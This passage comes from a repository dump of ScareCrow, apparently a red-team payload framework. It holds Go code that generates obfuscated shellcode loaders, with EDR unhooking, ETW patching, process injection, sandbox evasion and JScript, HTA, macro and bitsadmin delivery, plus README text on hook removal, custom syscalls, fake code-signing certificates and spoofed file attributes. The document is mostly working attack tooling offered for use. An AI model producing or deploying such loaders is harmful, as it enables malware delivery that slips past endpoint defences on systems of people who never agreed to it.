= Cryptor.VarNumberLength(4, 12) 515 | Binary.Variables["hh"] = Cryptor.VarNumberLength(4, 12) 516 | Binary.Variables["lpBaseAddress"] = Cryptor.VarNumberLength(4, 12) 517 | Binary.Variables["lpBuffer"] = Cryptor.VarNumberLength(4, 12) 518 | Binary.Variables["lpNumberOfBytesWritten"] = Cryptor.VarNumberLength(4, 12) 519 | Binary.Variables["mi"] = Cryptor.VarNumberLength(4, 12) 520 | Binary.Variables["MI"] = Cryptor.VarNumberLength(4, 12) 521 | Binary.Variables["mod"] = Cryptor.VarNumberLength(4, 12) 522 | Binary.Variables["modules"] = Cryptor.VarNumberLength(4, 12) 523 | Binary.Variables["module"] = Cryptor.VarNumberLength(4, 12) 524 | Binary.Variables["nLength"] = Cryptor.VarNumberLength(4, 12) 525 | Binary.Variables["nSize"] = Cryptor.VarNumberLength(4, 12) 526 | Binary.Variables["name"] = Cryptor.VarNumberLength(4, 12) 527 | Binary.Variables["needed"] = Cryptor.VarNumberLength(4, 12) 528 | Binary.Variables["n"] = Cryptor.VarNumberLength(4, 12) 529 | Binary.Variables["offsetaddr"] = Cryptor.VarNumberLength(4, 12) 530 | Binary.Variables["oldProtect"] = Cryptor.VarNumberLength(4, 12) 531 | Binary.Variables["outString"] = Cryptor.VarNumberLength(4, 12) 532 | Binary.Variables["pi"] = Cryptor.VarNumberLength(4, 12) 533 | Binary.Variables["procEnumProcessModules"] = Cryptor.VarNumberLength(4, 12) 534 | Binary.Variables["EnumProcessModules"] = Cryptor.VarNumberLength(4, 12) 535 | Binary.Variables["procGetModuleBaseName"] = Cryptor.VarNumberLength(4, 12) 536 | Binary.Variables["GetModuleBaseName"] = Cryptor.VarNumberLength(4, 12) 537 | Binary.Variables["procGetModuleInformation"] = Cryptor.VarNumberLength(4, 12) 538 | Binary.Variables["procWriteProcessMemory"] = Cryptor.VarNumberLength(4, 12) 539 | Binary.Variables["process"] = Cryptor.VarNumberLength(4, 12) 540 | Binary.Variables["rawbytes"] = Cryptor.VarNumberLength(4, 12) 541 | Binary.Variables["raw_bin"] = Cryptor.VarNumberLength(4, 12) 542 | Binary.Variables["regionsize"] = Cryptor.VarNumberLength(4, 12) 543 | 
Binary.Variables["s"] = Cryptor.VarNumberLength(4, 12) 544 | Binary.Variables["shellcode"] = Cryptor.VarNumberLength(4, 12) 545 | Binary.Variables["si"] = Cryptor.VarNumberLength(4, 12) 546 | Binary.Variables["size"] = Cryptor.VarNumberLength(4, 12) 547 | Binary.Variables["startupInfo"] = Cryptor.VarNumberLength(4, 12) 548 | Binary.Variables["x"] = Cryptor.VarNumberLength(4, 12) 549 | 550 | WindowsVersion.Variables["Version"] = Binary.Variables["Version"] 551 | WindowsVersion.Variables["syscall"] = Binary.Variables["syscall"] 552 | WindowsVersion.Variables["customsyscall"] = Binary.Variables["customsyscall"] 553 | 554 | buffer.Reset() 555 | WindowsVersionTemplate, err := template.New("WindowsVersion").Parse(Struct.WindowsVersion_Binary()) 556 | if err != nil { 557 | log.Fatal(err) 558 | 559 | } 560 | buffer.Reset() 561 | if err := WindowsVersionTemplate.Execute(&buffer, WindowsVersion); err != nil { 562 | log.Fatal(err) 563 | } 564 | Binary.Variables["SyscallNumberlist"] = buffer.String() 565 | buffer.Reset() 566 | 567 | if console == true && ProcessInjection == "" { 568 | Binary.Variables["hide"] = Binary.Variables["Console"] + "(true)" 569 | Binary.Variables["DebugImport"] = "\"io\"" 570 | Binary.Variables["Debug"] = ` 571 | var ( 572 | debugWriter io.Writer 573 | ) 574 | 575 | func printDebug(format string, v ...interface{}) { 576 | debugWriter = os.Stdout 577 | output := fmt.Sprintf("[DEBUG] ") 578 | output += format +"\n" 579 | fmt.Fprintf(debugWriter, output, v...) 
580 | } 581 | ` 582 | Binary.Variables["RefreshPE"] = "printDebug(\"RefreshPE failed:\", err)" 583 | Binary.Variables["EDR"] = "printDebug(\"[+] EDR removed\")" 584 | Binary.Variables["ShellcodeString"] = "printDebug(\"[*] Loading shellcode into a string\")" 585 | Binary.Variables["Pointer"] = "printDebug(\"[*] Create a Pointer on stack\")" 586 | Binary.Variables["CopyPointer"] = "printDebug(\"[*] Copy Pointer's attributes\")" 587 | Binary.Variables["OverwrittenShellcode"] = "printDebug(\"[*] Overwriten Pointer to point to shellcode String\")" 588 | Binary.Variables["OverWrittenPoint"] = "printDebug(\"[*] Overwriting shellcode String with Pointer's attributes\")" 589 | Binary.Variables["ReloadingMessage"] = "printDebug(\"[+] Reloading: \"+name +\" \")" 590 | Binary.Variables["VersionMessage"] = "printDebug(\"[+] Detected Version: \" +" + WindowsVersion.Variables["Version"] + ")" 591 | 592 | } else if console == true && ProcessInjection != "" { 593 | Binary.Variables["hide"] = Binary.Variables["Console"] + "(true)" 594 | Binary.Variables["DebugImport"] = `"io" 595 | "os"` 596 | Binary.Variables["Debug"] = ` 597 | var ( 598 | debugWriter io.Writer 599 | ) 600 | 601 | func printDebug(format string, v ...interface{}) { 602 | debugWriter = os.Stdout 603 | output := fmt.Sprintf("[DEBUG] ") 604 | output += format +"\n" 605 | fmt.Fprintf(debugWriter, output, v...) 
606 | } 607 | ` 608 | Binary.Variables["RefreshPE"] = "printDebug(\"RefreshPE failed:\", err)" 609 | Binary.Variables["EDR"] = "printDebug(\"[+] EDR removed\")" 610 | Binary.Variables["ShellcodeString"] = "printDebug(\"[*] Loading shellcode into a string\")" 611 | Binary.Variables["Pointer"] = "printDebug(\"[*] Create a Pointer on stack\")" 612 | Binary.Variables["CopyPointer"] = "printDebug(\"[*] Copy Pointer's attributes\")" 613 | Binary.Variables["OverwrittenShellcode"] = "printDebug(\"[*] Overwriten Pointer to point to shellcode String\")" 614 | Binary.Variables["OverWrittenPoint"] = "printDebug(\"[*] Overwriting shellcode String with Pointer's attributes\")" 615 | Binary.Variables["ReloadingMessage"] = "printDebug(\"[+] Reloading: \"+name +\" \")" 616 | Binary.Variables["VersionMessage"] = "printDebug(\"[+] Detected Version: \" +" + WindowsVersion.Variables["Version"] + ")" 617 | 618 | Binary.Variables["PPIDMessage"] = 619 | `strpid := fmt.Sprint(` + Binary.Variables["pi"] + `.ProcessId) 620 | printDebug("[*] Creating Remote Process: " + strpid) 621 | printDebug("[*] Creating Handle to Remote Process")` 622 | Binary.Variables["ModuleMessage"] = "printDebug(\"[*] Mapping Modules:\")" 623 | Binary.Variables["addr"] = Cryptor.VarNumberLength(4, 12) 624 | Binary.Variables["RemoteModuleEnumeration"] = 625 | `` + Binary.Variables["addr"] + `:= fmt.Sprintf("%X", ` + Binary.Variables["MI"] + `.LpBaseOfDll) 626 | printDebug("[+] " + ` + Binary.Variables["s"] + ` + "'s Base Address: " + ` + Binary.Variables["addr"] + `) 627 | printDebug("[*] Reloading " + ` + Binary.Variables["s"] + ` + "'s .Text Field")` 628 | Binary.Variables["RemoteModuleMessage"] = "printDebug(\"[+] Reloaded and unhooked EDR\")" 629 | Binary.Variables["RemoteReloading"] = "printDebug(\"[+] Interacting with Remote Process\")" 630 | Binary.Variables["Injecting"] = "printDebug(\"[+] Injecting Shellcode into Remote Process\")" 631 | Binary.Variables["Injected"] = "printDebug(\"[+] Injected!\")" 632 | 
633 | } else { 634 | Binary.Variables["hide"] = Binary.Variables["Console"] + "(false)" 635 | Binary.Variables["DebugImport"] = "" 636 | Binary.Variables["Debug"] = "" 637 | Binary.Variables["RefreshPE"] = "" 638 | Binary.Variables["EDR"] = "" 639 | Binary.Variables["ShellcodeString"] = "" 640 | Binary.Variables["Pointer"] = "" 641 | Binary.Variables["CopyPointer"] = "" 642 | Binary.Variables["OverwrittenShellcode"] = "" 643 | Binary.Variables["OverWrittenPoint"] = "" 644 | Binary.Variables["ReloadingMessage"] = "" 645 | Binary.Variables["VersionMessage"] = "" 646 | 647 | Binary.Variables["RemoteModuleEnumeration"] = "" 648 | Binary.Variables["PPIDMessage"] = "" 649 | Binary.Variables["ModuleMessage"] = "" 650 | Binary.Variables["RemoteModuleMessage"] = "" 651 | Binary.Variables["RemoteReloading"] = "" 652 | Binary.Variables["Injecting"] = "" 653 | Binary.Variables["Injected"] = "" 654 | } 655 | 656 | if sandbox == true { 657 | Binary.Variables["IsDomainJoined"] = Cryptor.VarNumberLength(4, 12) 658 | Binary.Variables["domain"] = Cryptor.VarNumberLength(4, 12) 659 | Binary.Variables["status"] = Cryptor.VarNumberLength(4, 12) 660 | SandboxFunctionTemplate, err := template.New("Sandboxfunction").Parse(Struct.Sandbox()) 661 | if err != nil { 662 | log.Fatal(err) 663 | } 664 | if err := SandboxFunctionTemplate.Execute(&buffer, Binary); err != nil { 665 | log.Fatal(err) 666 | } 667 | Binary.Variables["Sandboxfunction"] = buffer.String() 668 | Binary.Variables["checker"] = Cryptor.VarNumberLength(4, 12) 669 | Sandbox_DomainJoinedTemplate, err := template.New("Sandbox_DomainJoined").Parse(Struct.Sandbox_DomainJoined()) 670 | buffer.Reset() 671 | if err != nil { 672 | log.Fatal(err) 673 | } 674 | if err := Sandbox_DomainJoinedTemplate.Execute(&buffer, Binary); err != nil { 675 | log.Fatal(err) 676 | } 677 | Binary.Variables["Sandbox"] = buffer.String() 678 | buffer.Reset() 679 | } else { 680 | Binary.Variables["Sandbox"] = "" 681 | Binary.Variables["Sandboxfunction"] = "" 
682 | Binary.Variables["SandboxImport"] = "" 683 | } 684 | 685 | if ETW == true { 686 | ETW_Function, ETW := ETW_Buff() 687 | Binary.Variables["ETW"] = ETW + "()" 688 | Binary.Variables["ETW_Function"] = ETW_Function 689 | } else { 690 | Binary.Variables["ETW"] = "" 691 | Binary.Variables["ETW_Function"] = "" 692 | } 693 | 694 | if ProcessInjection != "" { 695 | ProcessInjection = strings.Replace(ProcessInjection, "\\", "\\\\", -1) 696 | Binary.Variables["processpath"] = ProcessInjection 697 | 698 | Structure = Struct.Procces_Injection() 699 | } else { 700 | Structure = Struct.Binary() 701 | } 702 | 703 | BinaryTemplate, err := template.New("Binary").Parse(Structure) 704 | if err != nil { 705 | log.Fatal(err) 706 | } 707 | if err := BinaryTemplate.Execute(&buffer, Binary); err != nil { 708 | log.Fatal(err) 709 | } 710 | return buffer.String() 711 | } 712 | 713 | func JScriptLoader_Buff(name string, filename string, mode string, sandbox bool) (string, string, string) { 714 | var LoaderTemplate string 715 | var buffer bytes.Buffer 716 | JScriptLoader := &JScriptLoader{} 717 | JScriptLoader.Variables = make(map[string]string) 718 | JScriptLoader.Variables["fso"] = Cryptor.VarNumberLength(4, 12) 719 | JScriptLoader.Variables["dropPath"] = Cryptor.VarNumberLength(4, 12) 720 | JScriptLoader.Variables["value"] = Cryptor.VarNumberLength(4, 12) 721 | JScriptLoader.Variables["strRegPath"] = Cryptor.VarNumberLength(4, 12) 722 | JScriptLoader.Variables["WshShell"] = Cryptor.VarNumberLength(4, 12) 723 | JScriptLoader.Variables["objShell"] = Cryptor.VarNumberLength(4, 12) 724 | if mode == "excel" { 725 | JScriptLoader.Variables["ApplicationName"] = "excel.exe" 726 | JScriptLoader.Variables["RegName"] = "Excel" 727 | JScriptLoader.Variables["dllext"] = ".xll" 728 | JScriptLoader.Variables["objapp"] = Cryptor.VarNumberLength(4, 12) 729 | JScriptLoader.Variables["Application_Version"] = Cryptor.VarNumberLength(4, 12) 730 | JScriptLoader.Variables["FileName"] = name 731 | 
JScriptLoader.Variables["filename"] = filename 732 | LoaderTemplate = Struct.JS_Office_Sub() 733 | } 734 | if mode == "control" { 735 | LoaderTemplate = Struct.JS_Control_Sub() 736 | JScriptLoader.Variables["dllext"] = ".cpl" 737 | JScriptLoader.Variables["filename"] = filename 738 | JScriptLoader.Variables["FileName"] = name 739 | } 740 | if mode == "msiexec" { 741 | LoaderTemplate = Struct.JS_Msiexec_Sub() 742 | JScriptLoader.Variables["dllext"] = ".dll" 743 | JScriptLoader.Variables["filename"] = filename 744 | JScriptLoader.Variables["FileName"] = name 745 | } 746 | if mode == "wscript" { 747 | JScriptLoader.Variables["dllext"] = ".dll" 748 | JScriptLoader.Variables["FileName"] = name 749 | JScriptLoader.Variables["DLLName"] = name 750 | JScriptLoader.Variables["manifest"] = Cryptor.VarNumberLength(4, 12) 751 | JScriptLoader.Variables["ax"] = Cryptor.VarNumberLength(4, 12) 752 | JScriptLoader.Variables["Execute"] = Cryptor.VarNumberLength(4, 12) 753 | JScriptLoader.Variables["progid"] = Cryptor.VarNumberLength(4, 12) 754 | JScriptLoader.Variables["filename"] = name 755 | LoaderTemplate = Struct.WS_JS() 756 | } 757 | buffer.Reset() 758 | JSLoaderTemplate, err := template.New("JScriptLoader").Parse(LoaderTemplate) 759 | if err != nil { 760 | log.Fatal(err) 761 | } 762 | buffer.Reset() 763 | if err = JSLoaderTemplate.Execute(&buffer, JScriptLoader); err != nil { 764 | log.Fatal(err) 765 | } 766 | 767 | return buffer.String(), JScriptLoader.Variables["fso"], JScriptLoader.Variables["dropPath"] 768 | 769 | } 770 | 771 | func JScript_Buff(fso string, dropPath string, encoded string, code string, name string, mode string, sandbox bool) string { 772 | var buffer bytes.Buffer 773 | JScript := &JScript{} 774 | SandboxJScript := &SandboxJScript{} 775 | JScript.Variables = make(map[string]string) 776 | SandboxJScript.Variables = make(map[string]string) 777 | JScript.Variables["DLLName"] = Cryptor.VarNumberLength(4, 12) 778 | JScript.Variables["fso"] = fso 779 | 
JScript.Variables["dropPath"] = dropPath 780 | JScript.Variables["Base64"] = Cryptor.VarNumberLength(4, 12) 781 | JScript.Variables["base6411"] = Cryptor.VarNumberLength(4, 12) 782 | JScript.Variables["rtest"] = Cryptor.VarNumberLength(4, 12) 783 | JScript.Variables["atest"] = Cryptor.VarNumberLength(4, 12) 784 | JScript.Variables["ctest"] = Cryptor.VarNumberLength(4, 12) 785 | JScript.Variables["ttest"] = Cryptor.VarNumberLength(4, 12) 786 | JScript.Variables["etest"] = Cryptor.VarNumberLength(4, 12) 787 | JScript.Variables["htest"] = Cryptor.VarNumberLength(4, 12) 788 | JScript.Variables["atest"] = Cryptor.VarNumberLength(4, 12) 789 | JScript.Variables["TextStream11"] = Cryptor.VarNumberLength(4, 12) 790 | JScript.Variables["res1"] = Cryptor.VarNumberLength(4, 12) 791 | JScript.Variables["filename1"] = Cryptor.VarNumberLength(4, 12) 792 | JScript.Variables["characters"] = Cryptor.VarNumberLength(4, 12) 793 | JScript.Variables["base6411decoded"] = Cryptor.VarNumberLength(4, 12) 794 | JScript.Variables["BinaryStream"] = Cryptor.VarNumberLength(4, 12) 795 | JScript.Variables["binaryWriter"] = Cryptor.VarNumberLength(4, 12) 796 | JScript.Variables["dllname"] = "" 797 | JScript.Variables["dllvar"] = Cryptor.VarNumberLength(4, 12) 798 | JScript.Variables["dll"] = Utils.B64ripper(encoded, JScript.Variables["dllvar"], false) 799 | JScript.Variables["Loader"] = code 800 | if mode == "excel" { 801 | JScript.Variables["dllext"] = ".xll" 802 | JScript.Variables["FileName"] = name 803 | } 804 | if mode == "control" { 805 | JScript.Variables["dllext"] = ".cpl" 806 | JScript.Variables["FileName"] = name 807 | } 808 | if mode == "wscript" { 809 | JScript.Variables["dllext"] = ".dll" 810 | JScript.Variables["FileName"] = name 811 | } 812 | if mode == "msiexec" { 813 | JScript.Variables["dllext"] = ".dll" 814 | JScript.Variables["FileName"] = name 815 | } 816 | buffer.Reset() 817 | JSTemplate, err := template.New("JScript").Parse(Struct.JSfile()) 818 | if err != nil { 819 | 
log.Fatal(err) 820 | } 821 | buffer.Reset() 822 | if err = JSTemplate.Execute(&buffer, JScript); err != nil { 823 | log.Fatal(err) 824 | } 825 | 826 | if sandbox == true { 827 | SandboxJScript.Variables["objShell"] = Cryptor.VarNumberLength(4, 12) 828 | SandboxJScript.Variables["domain"] = Cryptor.VarNumberLength(4, 12) 829 | SandboxJScript.Variables["loader"] = buffer.String() 830 | buffer.Reset() 831 | SandboxJSTemplate, err := template.New("SandboxJScript").Parse(Struct.WScript_Sandbox()) 832 | if err != nil { 833 | log.Fatal(err) 834 | } 835 | if err = SandboxJSTemplate.Execute(&buffer, SandboxJScript); err != nil { 836 | log.Fatal(err) 837 | } 838 | } else { 839 | 840 | } 841 | return buffer.String() 842 | } 843 | 844 | func HTA_Buff(hexcode string, filename string) string { 845 | var buffer bytes.Buffer 846 | HTALoader := &HTALoader{} 847 | HTALoader.Variables = make(map[string]string) 848 | HTALoader.Variables["payload"] = hexcode 849 | HTALoader.Variables["filename"] = filename 850 | HTALoader.Variables["RNZyt"] = Cryptor.VarNumberLength(4, 9) 851 | HTALoader.Variables["bogusWindows1252Chars"] = Cryptor.VarNumberLength(4, 9) 852 | HTALoader.Variables["correctLatin1Chars"] = Cryptor.VarNumberLength(4, 9) 853 | HTALoader.Variables["fos"] = Cryptor.VarNumberLength(4, 9) 854 | HTALoader.Variables["obshell"] = Cryptor.VarNumberLength(4, 9) 855 | HTALoader.Variables["pathworks"] = Cryptor.VarNumberLength(4, 9) 856 | HTALoader.Variables["dest"] = Cryptor.VarNumberLength(4, 9) 857 | HTALoader.Variables["fromByte"] = Cryptor.VarNumberLength(4, 9) 858 | HTALoader.Variables["decode"] = Cryptor.VarNumberLength(4, 9) 859 | HTALoader.Variables["chunkSize"] = Cryptor.VarNumberLength(4, 9) 860 | HTALoader.Variables["source"] = Cryptor.VarNumberLength(4, 9) 861 | HTALoader.Variables["decodedFile"] = Cryptor.VarNumberLength(4, 9) 862 | HTALoader.Variables["decode"] = Cryptor.VarNumberLength(4, 9) 863 | HTALoader.Variables["hexString"] = Cryptor.VarNumberLength(4, 9) 864 | 
HTALoader.Variables["fromByte"] = Cryptor.VarNumberLength(4, 9) 865 | HTALoader.Variables["decodedFile"] = Cryptor.VarNumberLength(4, 9) 866 | HTALoader.Variables["sleep"] = Cryptor.VarNumberLength(4, 9) 867 | HTALoader.Variables["obshell"] = Cryptor.VarNumberLength(4, 9) 868 | HTALoader.Variables["test1"] = Cryptor.VarNumberLength(4, 9) 869 | 870 | buffer.Reset() 871 | HTATemplate, err := template.New("HTALoader").Parse(Struct.HTA()) 872 | if err != nil { 873 | log.Fatal(err) 874 | } 875 | buffer.Reset() 876 | if err = HTATemplate.Execute(&buffer, HTALoader); err != nil { 877 | log.Fatal(err) 878 | } 879 | return buffer.String() 880 | } 881 | 882 | func Macro_Buff(URL string, outFile string) { 883 | var buffer bytes.Buffer 884 | macro := &Macro{} 885 | macro.Variables = make(map[string]string) 886 | macro.Variables["HTTPReq"] = Cryptor.VarNumberLength(4, 9) 887 | macro.Variables["t"] = Cryptor.VarNumberLength(4, 9) 888 | macro.Variables["remoteFile"] = Cryptor.VarNumberLength(4, 9) 889 | macro.Variables["pathOfFile"] = Cryptor.VarNumberLength(4, 9) 890 | macro.Variables["obj"] = Cryptor.VarNumberLength(4, 9) 891 | macro.Variables["Full"] = Cryptor.VarNumberLength(4, 9) 892 | macro.Variables["output"] = Cryptor.VarNumberLength(4, 9) 893 | macro.Variables["storeIn"] = Cryptor.VarNumberLength(4, 9) 894 | macro.Variables["sleep"] = Cryptor.VarNumberLength(4, 9) 895 | macro.Variables["outFile"] = outFile 896 | macro.Variables["URL"] = URL 897 | 898 | buffer.Reset() 899 | macroTemplate, err := template.New("macro").Parse(Struct.Macro()) 900 | if err != nil { 901 | log.Fatal(err) 902 | } 903 | buffer.Reset() 904 | if err := macroTemplate.Execute(&buffer, macro); err != nil { 905 | log.Fatal(err) 906 | } 907 | fmt.Println(buffer.String()) 908 | } 909 | 910 | func CompileFile(b64ciphertext string, b64key string, b64iv string, mode string, outFile string, refresher bool, console bool, sandbox bool, ETW bool, ProcessInjection string) (string, string) { 911 | var code string 
912 | name, filename := FileName(mode) 913 | if ETW == true { 914 | fmt.Println("[+] Patched ETW Enabled") 915 | } 916 | if ProcessInjection != "" && ETW == true { 917 | fmt.Println("[!] Warning ETW Will Only be Patched in the Primarly Process Not the Created One") 918 | } 919 | if ProcessInjection != "" { 920 | fmt.Println("[+] Process Injection Mode Enabled") 921 | fmt.Println("[*] Created Process: " + ProcessInjection) 922 | } 923 | if mode == "excel" || mode == "wscript" || mode == "control" || mode == "dll" || mode == "msiexec" { 924 | code = DLLfile(b64ciphertext, b64key, b64iv, mode, refresher, name, sandbox, ETW, ProcessInjection) 925 | } else { 926 | code = Binaryfile(b64ciphertext, b64key, b64iv, mode, console, sandbox, name, ETW, ProcessInjection) 927 | } 928 | os.MkdirAll(name, os.ModePerm) 929 | Utils.Writefile(name+"/"+name+".go", code) 930 | Utils.B64decode("loader.zip") 931 | Utils.Unzip("loader.zip", name) 932 | os.RemoveAll("loader.zip") 933 | os.Chdir(name) 934 | return name, filename 935 | } 936 | func CompileLoader(mode string, outFile string, filename string, name string, CommandLoader string, URL string, sandbox bool) { 937 | if mode == "excel" { 938 | os.Rename(name+".dll", name+".xll") 939 | } else if mode == "control" { 940 | os.Rename(name+".dll", name+".cpl") 941 | if outFile == "" { 942 | os.Chdir("..") 943 | os.Rename(name+"/"+name+".cpl", name+".cpl") 944 | os.RemoveAll(name) 945 | fmt.Println("[+] " + name + ".cpl File Ready") 946 | if CommandLoader == "control" { 947 | outFile = name + ".cpl" 948 | Utils.Command(URL, CommandLoader, outFile) 949 | } 950 | return 951 | } 952 | } else if mode == "wscript" { 953 | os.Rename(outFile+".dll", name+".dll") 954 | } else if mode == "msiexec" { 955 | os.Rename(outFile+".dll", name+".dll") 956 | } else if mode == "binary" { 957 | os.Chdir("..") 958 | os.Rename(name+"/"+name+".exe", name+".exe") 959 | os.RemoveAll(name) 960 | fmt.Println("[+] Binary Compiled") 961 | if CommandLoader == "bits" { 
962 | outFile = name + ".exe" 963 | Utils.Command(URL, CommandLoader, outFile) 964 | } 965 | return 966 | } else if mode == "dll" { 967 | os.Chdir("..") 968 | os.Rename(name+"/"+name+".dll", name+".dll") 969 | os.RemoveAll(name) 970 | fmt.Println("[+] DLL Compiled") 971 | fmt.Println("[!] Note: Loading a dll (with Rundll32 or Regsvr32) that has the same name as a valid system DLL will cause problems, in this case its best to change the name slightly") 972 | return 973 | } 974 | fmt.Println("[*] Creating Loader") 975 | code, fso, dropPath := JScriptLoader_Buff(name, filename, mode, sandbox) 976 | f, _ := os.Open(filename) 977 | reader := bufio.NewReader(f) 978 | content, _ := ioutil.ReadAll(reader) 979 | encoded := base64.StdEncoding.EncodeToString(content) 980 | finalcode := JScript_Buff(fso, dropPath, encoded, code, name, mode, sandbox) 981 | URL = Utils.Command(URL, CommandLoader, outFile) 982 | if CommandLoader == "hta" { 983 | hexcode := hex.EncodeToString(content) 984 | finalcode = HTA_Buff(hexcode, filename) 985 | 986 | } 987 | if CommandLoader == "macro" { 988 | Macro_Buff(URL, outFile) 989 | } 990 | Utils.Writefile(outFile, finalcode) 991 | os.Chdir("..") 992 | os.Rename(name+"/"+outFile, outFile) 993 | os.RemoveAll(name) 994 | fmt.Println("[+] Loader Compiled") 995 | } 996 | -------------------------------------------------------------------------------- /Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/README.md: -------------------------------------------------------------------------------- 1 | 2 |

6 | ScareCrow 7 |

8 | 9 | 10 | 11 | ## More Information 12 | If you want to learn more about the techniques utilized in this framework, please take a look at [Part 1](https://www.optiv.com/explore-optiv-insights/source-zero/endpoint-detection-and-response-how-hackers-have-evolved) and [Part 2](https://www.optiv.com/explore-optiv-insights/source-zero/edr-and-blending-how-attackers-avoid-getting-caught) 13 | # 14 | 15 | ## Description 16 | ScareCrow is a payload creation framework for side loading (not injecting) into a legitimate Windows process (bypassing Application Whitelisting controls). Once the DLL loader is loaded into memory, it utilizes a technique to flush an EDR’s hooks out of the system DLLs running in the process's memory. This works because we know the EDR’s hooks are placed when a process is spawned. ScareCrow can target these DLLs and manipulate them in memory by using the API function VirtualProtect, which changes the permissions of a section of a process’ memory to a different value, specifically from Execute–Read to Read-Write-Execute. 17 | 18 | When executed, ScareCrow will copy the bytes of the system DLLs stored on disk in `C:\Windows\System32\`. These DLLs are stored on disk “clean” of EDR hooks because they are used by the system to load an unaltered copy into a new process when it’s spawned. Since EDRs only hook these processes in memory, the on-disk DLLs remain unaltered. ScareCrow does not copy the entire DLL file; instead it focuses only on the .text section of the DLLs. This section of a DLL contains the executable assembly, and by doing this ScareCrow helps reduce the likelihood of detection, as re-reading entire files can cause an EDR to detect that there is a modification to a system resource. The data is then copied into the right region of memory by using each function’s offset. Each function has an offset which denotes the exact number of bytes from the base address where it resides, providing the function’s location on the stack. 
To do this, ScareCrow changes the permissions of the .text region of memory using VirtualProtect. Even though this is a system DLL, since it has been loaded into our process (that we control), we can change the memory permissions without requiring elevated privileges. 19 | 20 | Once these hooks are removed, ScareCrow then utilizes custom System Calls to load and run shellcode in memory. ScareCrow does this even after the EDR hooks are removed to help avoid detection by non-userland, hook-based telemetry gathering tools such as Event Tracing for Windows (ETW) or other event logging mechanisms. These custom system calls are also used to perform the VirtualProtect call to remove the hooks placed by EDRs, described above, to avoid detection by any EDR’s anti-tamper controls. This is done by calling a custom version of the VirtualProtect syscall, NtProtectVirtualMemory. ScareCrow utilizes Golang to generate these loaders and assembly for these custom syscall functions. 21 | 22 | ScareCrow loads the shellcode into memory by first decrypting the shellcode, which is encrypted by default using AES encryption with a decryption key and an initialization vector. Once decrypted and loaded, the shellcode is then executed. Depending on the loader options specified, ScareCrow will set up different export functions for the DLL. The loaded DLL also does not contain the standard DllMain function which all DLLs typically need to operate. The DLL will still execute without any issue because the process we load into will look for those export functions and not worry about DllMain being there. 23 | 24 | ### Binary Sample 25 |

26 | After 27 |

28 | 29 | 30 | During the creation process of the loader, ScareCrow utilizes a library for blending into the background after a beacon calls home. This library does two things: 31 | * Code signs the Loader: 32 | Files that are signed with code signing certificates are often put under less scrutiny, making them easier to execute without being challenged, as files signed by a trusted name are often less suspicious than others. Many antimalware products do not fully validate and verify these certificates (some now do, but common vendor names are typically included in a whitelist). ScareCrow creates these certificates by using a Go package version of the tool `limelighter` to create a PKCS#12 (.pfx) file. This package takes a user-supplied domain name to create a code signing certificate for that domain. If needed, you can also use your own code signing certificate if you have one, using the `-valid` command-line option. 33 | * Spoof the attributes of the loader: 34 | This is done by using syso files, a form of embedded resource file that, when compiled along with our loader, modifies the attribute portions of our compiled code. Prior to generating a syso file, ScareCrow will generate a random file name (based on the loader type) to use. Once chosen, this file name will map to the associated attributes for that file name, ensuring that the right values are assigned. 35 | 36 | ### File Attribute Sample 37 | 38 |

39 | 40 | With these files and the go code, ScareCrow will cross compile them into DLLs using the c-shared library option. Once the DLL is compiled, it is obfuscated into a broken base64 string that will be embedded into a file. This allows for the file to be remotely pulled, accessed, and programmatically executed. 41 | 42 | 43 | ## Install 44 | The first step as always is to clone the repo. Before you compile ScareCrow, you'll need to install the dependencies. 45 | 46 | To install them, run following commands: 47 | 48 | ``` 49 | go get github.com/fatih/color 50 | go get github.com/yeka/zip 51 | go get github.com/josephspurrier/goversioninfo 52 | ``` 53 | Make sure that the following are installed on your OS: 54 | ``` 55 | openssl 56 | osslsigncode 57 | mingw-w64 58 | ``` 59 | 60 | Then build it 61 | 62 | ``` 63 | go build ScareCrow.go 64 | ``` 65 | 66 | ## Help 67 | 68 | ``` 69 | 70 | ./ScareCrow -h 71 | 72 | _________ _________ 73 | / _____/ ____ _____ _______ ____ \_ ___ \_______ ______ _ __ 74 | \_____ \_/ ___\\__ \\_ __ \_/ __ \/ \ \/\_ __ \/ _ \ \/ \/ / 75 | / \ \___ / __ \| | \/\ ___/\ \____| | \( <_> ) / 76 | /_______ /\___ >____ /__| \___ >\______ /|__| \____/ \/\_/ 77 | \/ \/ \/ \/ \/ 78 | (@Tyl0us) 79 | “Fear, you must understand is more than a mere obstacle. 80 | Fear is a TEACHER. the first one you ever had.” 81 | 82 | Usage of ./ScareCrow: 83 | -I string 84 | Path to the raw 64-bit shellcode. 85 | -Loader string 86 | Sets the type of process that will sideload the malicious payload: 87 | [*] binary - Generates a binary based payload. (This type does not benefit from any sideloading) 88 | [*] control - Loads a hidden control applet - the process name would be rundll32 if -O is specified. A JScript loader will be generated. 89 | [*] dll - Generates just a DLL file. Can be executed with commands such as rundll32 or regsvr32 with DllRegisterServer, DllGetClassObject as export functions. 
90 | [*] excel - Loads into a hidden Excel process using a JScript loader. 91 | [*] msiexec - Loads into MSIexec process using a JScript loader. 92 | [*] wscript - Loads into WScript process using a JScript loader. 93 | (default "binary") 94 | -O string 95 | Name of output file (e.g. loader.js or loader.hta). If Loader is set to dll or binary this option is not required. 96 | -configfile string 97 | The path to a json based configuration file to generate custom file attributes. This will not use the default ones. 98 | -console 99 | Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature. 100 | -delivery string 101 | Generates a one-liner command to download and execute the payload remotely: 102 | [*] bits - Generates a Bitsadmin one liner command to download, execute and remove the loader (Compatible with Binary, Control, Excel and Wscript Loaders). 103 | [*] hta - Generates a blank hta file containing the loader along with a MSHTA command to execute the loader remotely in the background (Compatible with Control and Excel Loaders). 104 | [*] macro - Generates an office macro that will download and execute the loader remotely (Compatible with Control, Excel and Wscript Loaders) 105 | -domain string 106 | The domain name to use for creating a fake code signing cert. (e.g. www.acme.com) 107 | -etw 108 | Enables ETW patching to prevent ETW events from being generated 109 | -injection string 110 | Enables Process Injection Mode and specifies the path to the process to create/inject into (use \ for the path). 111 | -password string 112 | The password for the code signing cert. Required when -valid is used. 113 | -sandbox 114 | Enables sandbox evasion using IsDomainedJoined calls. 
